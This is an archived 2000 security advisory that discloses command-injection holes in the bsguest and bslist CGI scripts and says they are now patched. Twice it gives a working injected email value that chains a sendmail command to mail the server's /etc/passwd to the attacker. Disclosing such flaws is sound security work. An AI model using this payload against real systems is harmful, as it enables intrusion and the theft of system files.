OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: BS Scripts Vulnerabilities
From: rivendell_teamYAHOO.COM
Date: Thu Dec 21 2000 - 01:19:31 CST


++++++++++++++++++++++++++++++++++++
BS Scripts Multiple CGI Vulnerabilities
Discovered by Elf (whitehatjoehotmail.com)
Greetz: 0x7f, CompSci, Dugnet
++++++++++++++++++++++++++++++++++++

Info

There are a couple of scripts from bsScripts
(www.stanback.net) , that have holes in them
because the author did not filter out ; from the form
input. The scripts that this affects is bsguest (a
guestbook script) and bslist (a mailing list script).
The hole allows anyone to execute commands on the
server. The author has been informed and the holes
are now patched in the latest release.

-bsguest.cgi-

BSGuest does not filter out ; resulting in the ability for
anyone to execute commands on the server. The
attacker just enters his email address
as 'hackerexample.com;/usr/sbin/sendmail
hackerexample.com < /etc/passwd', and then the
server mails a confirmation letter along with the
passwd file to the attacker.

-bslist.cgi-

BSList also doesn't filter out the ; and once again
anybody can execute commands on the server. This
can be exploited by signing up for the mailing list with
the email address of

'hackerexample.com;/usr/sbin/sendmail
hackerexample.com < /etc/passwd'

+++++++++++++++++++++++++++++
"It's funny how impossible dreams manifest" -
Cypress Hill
EOF
+++++++++++++++++++++++++++++